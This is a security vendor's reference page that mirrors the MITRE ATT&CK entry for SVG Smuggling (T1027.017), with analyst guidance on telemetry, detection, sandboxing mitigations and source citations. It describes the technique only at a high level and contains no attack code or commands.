Live Active security incident? Get immediate response
MITRE ATT&CK® Technique

T1027.017: SVG Smuggling

Adversaries may smuggle data and files past content filters by hiding malicious payloads inside of seemingly benign SVG files.[1] SVGs, or Scalable Vector Graphics, are vector-based image files constructed using XML. As such, they can legitimately include `` tags that enable adversaries to include malicious JavaScript payloads. However, SVGs may appear less suspicious to users than other types of executable files, as they are often treated as image files.

SVG smuggling can take a number of forms. For example, threat actors may include content that:

* Assembles malicious payloads[2] * Downloads malicious payloads[3] * Redirects users to malicious websites[4] * Displays interactive content to users, such as fake login forms and download buttons.[4]

SVG Smuggling may be used in conjunction with HTML Smuggling where an SVG with a malicious payload is included inside an HTML file.[2] SVGs may also be included in other types of documents, such as PDFs.

EnterpriseT1027.017Sub-techniqueObject v2.0 Modified
Discuss defensive coverage Back to ATT&CK
Glexia's Take

Analyst context for executives and security teams

Analyst confidence High

SVG Smuggling matters because it turns a file type many users and filters treat as an image into a delivery container for script-driven behavior, redirects, fake login prompts, or payload retrieval. For leaders, the practical risk is not “an image file” by itself; it is whether email, web, browser, endpoint, and user-reporting processes can recognize suspicious SVG behavior before it becomes credential theft, malware delivery, or incident response work.

Executive priority

Prioritize this as a control-validation issue across phishing resilience, content filtering, browser isolation, and SOC visibility. The supplied ATT&CK object places SVG Smuggling under stealth and Obfuscated Files or Information, which means the decision value is in proving that defenses inspect file content and runtime behavior rather than relying on file extension or user perception. Executives should ask whether SVG attachments and embedded SVGs in HTML or PDFs are inspected, sandboxed, logged, and escalated consistently enough to support incident decisions and audit evidence.

Technical view

ATT&CK lists Linux, macOS, and Windows platforms and notes that SVGs are XML-based files that can legitimately contain script tags. SOC and IR teams should validate visibility for SVG attachments, SVGs embedded in HTML or documents such as PDFs, script execution from SVG context, redirects to external sites, payload assembly or download behavior, and interactive phishing content such as fake login forms or download buttons. The related detection strategy DET0510 is specifically for SVG Smuggling with script execution and delivery behavior, so detection engineering should focus on behavior chains rather than static file naming alone.

Likely telemetry

  • Email security and mail gateway logs for SVG attachments, HTML files containing SVGs, and document attachments containing embedded SVG content
  • Web proxy, secure web gateway, DNS, and browser telemetry for redirects, external resource loads, and payload download attempts initiated after opening SVG content
  • Endpoint telemetry for browser or document-reader processes spawning unusual child processes, writing files, or initiating network connections after SVG interaction
  • File analysis or sandbox results that parse SVG/XML content and observe script behavior
  • User-reported phishing submissions and incident tickets involving image-like attachments, fake login forms, or unexpected download prompts

Detection direction

  • Validate that inspection parses SVG/XML content and does not trust the image file type or extension as benign.
  • Tune for combinations of SVG content with script tags, encoded or assembled payload content, redirect logic, download behavior, or credential-collection style interactive forms.
  • Correlate email delivery, browser execution, network redirects, and endpoint file/process activity to reduce false positives from legitimate SVG graphics that contain benign script or interactive elements.
  • Include relationship context with T1027 Obfuscated Files or Information: look for encoded, hidden, or assembled content in transit or on disk, not only known malicious indicators.
  • Use DET0510 as the ATT&CK-aligned detection reference, but verify local telemetry coverage because the ATT&CK object itself does not provide official detection text.

Mitigation priorities

  • Apply application isolation and sandboxing, including browser sandboxing where appropriate, to contain active content opened from untrusted sources.
  • Harden email and web content controls to inspect or detonate SVG files, SVGs inside HTML, and SVGs embedded in document formats such as PDFs.
  • Restrict or warn on risky active content from untrusted attachments where business processes do not require it.
  • Strengthen phishing reporting and triage workflows so image-like attachments that produce login prompts, redirects, or downloads are investigated quickly.
  • Use incident response playbooks that preserve the original SVG, related HTML/PDF containers, email headers, network destinations, and endpoint activity for analysis.
Analyst notes and limits

This technique is a sub-technique of T1027 Obfuscated Files or Information and is categorized under the stealth tactic. The most useful defensive framing is whether the organization can see through benign-looking file presentation into script execution and delivery behavior. The relationship to M1048 supports sandboxing and isolation as a mitigation direction; DET0510 supports behavior-focused detection validation.

The official ATT&CK object does not provide a detection section, and the supplied relationship context names DET0510 without detailed logic. Local conclusions require environment-specific evidence from mail, web, browser, endpoint, sandbox, and user-reporting systems. No attribution, active exploitation claim, customer exposure, or guaranteed detection coverage is implied by the supplied fields.

Official MITRE ATT&CK definition

SVG Smuggling

Adversaries may smuggle data and files past content filters by hiding malicious payloads inside of seemingly benign SVG files.[1] SVGs, or Scalable Vector Graphics, are vector-based image files constructed using XML. As such, they can legitimately include `` tags that enable adversaries to include malicious JavaScript payloads. However, SVGs may appear less suspicious to users than other types of executable files, as they are often treated as image files.

SVG smuggling can take a number of forms. For example, threat actors may include content that:

* Assembles malicious payloads[2] * Downloads malicious payloads[3] * Redirects users to malicious websites[4] * Displays interactive content to users, such as fake login forms and download buttons.[4]

SVG Smuggling may be used in conjunction with HTML Smuggling where an SVG with a malicious payload is included inside an HTML file.[2] SVGs may also be included in other types of documents, such as PDFs.

View the same entry on attack.mitre.org (MITRE-hosted reference; in-page links above use the Glexia ATT&CK library.)

Glexia analysis

How security teams should use this page

Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.

ATT&CK relationship table

Related techniques

This mirrors the MITRE pattern of making group, software, campaign, and technique relationships scannable. Relationship notes come from mirrored ATT&CK relationship text when available.

1 rows
Domain ID Name Relationship / procedure
Enterprise T1027 Obfuscated Files or Information This object subtechnique of Obfuscated Files or Information.
Relationship explorer

All related ATT&CK context

subtechnique of · Technique T1027: Obfuscated Files or Information Enterprise detects · Detection Strategy DET0510: Detection Strategy for SVG Smuggling with Script Execution and Delivery Behavior Enterprise mitigates · Mitigation M1048: Application Isolation and Sandboxing Enterprise
Mitigations

Mitigation direction

Mitigation Enterprise

M1048: Application Isolation and Sandboxing

Application Isolation and Sandboxing refers to the technique of restricting the execution of code to a controlled and isolated environment (e.g., a virtual environment, container, or sandbox). This method prevents potentially malicious code from affecting the rest of the system or network by limiting access to sensitive resources and critical operations. The goal is to contain threats and minimize their impact. This mitigation can be implemented through the following measures:

Browser Sandboxing:

- Use Case: Implement browser sandboxing to isolate untrusted web content and prevent malicious web pages or scripts from accessing sensitive system resources or initiating unauthorized downloads. - Implementation: Use browsers with built-in sandboxing features (e.g., Google Chrome, Microsoft Edge) or deploy enhanced browser security frameworks that limit the execution scope of active content. Consider controls that monitor or restrict script-based file generation and downloads commonly abused in evasion techniques like HTML smuggling.

Application Virtualization:

- Use Case: Deploy critical or high-risk applications in a virtualized environment to ensure any compromise does not affect the host system. - Implementation: Use application virtualization platforms to run applications in isolated environments.

Email Attachment Sandboxing:

- Use Case: Route email attachments to a sandbox environment to detect and block malware before delivering emails to end-users. - Implementation: Integrate security solutions with sandbox capabilities to analyze email attachments.

Endpoint Sandboxing:

- Use Case: Run all downloaded files and applications in a restricted environment to monitor their behavior for malicious activity. - Implementation: Use endpoint protection tools for sandboxing at the endpoint level.

Change history

Object version and sync metadata

The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE’s own release notes and roadmap, see ATT&CK resources — Updates .

ATT&CK release
19.1
Object version
2.0
Created
Modified
Raw hash
b5e6a6ad825adad7...
Imported snapshots across ATT&CK releases (1)
Release Bundle imported Object version Modified Status Raw hash
19.1 2.0 Current bundle b5e6a6ad825a…
Raw source

Mirrored ATT&CK source object

The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.

Open mirrored raw JSON Open MITRE-hosted copy
Source references

External references and citations

MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.

  1. [1]
    Trustwave SVG Smuggling 2025

    Bernard Bautista and Kevin Adriano. (2025, April 10). Pixel-Perfect Trap: The Surge of SVG-Borne Phishing Attacks. Retrieved April 14, 2025.

    Open source URL
  2. [2]
    Talos SVG Smuggling 2022

    Adam Katz and Jaeson Schultz. (2022, December 13). HTML smugglers turn to SVG images. Retrieved March 25, 2025.

    Open source URL
  3. [3]
    Cofense SVG Smuggling 2024

    Max Gannon. (2024, March 13). SVG Files Abused in Emerging Campaigns. Retrieved March 25, 2025.

    Open source URL
  4. [4]
    Bleeping Computer SVG Smuggling 2024

    Lawrence Abrams. (2024, November 17). Phishing emails increasingly use SVG attachments to evade detection. Retrieved March 25, 2025.

    Open source URL
  5. [5]
    mitre-attack T1027.017
    Open source URL
Source and licensing

Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.

Official MITRE ATT&CK site Official STIX data repository MITRE ATT&CK terms of use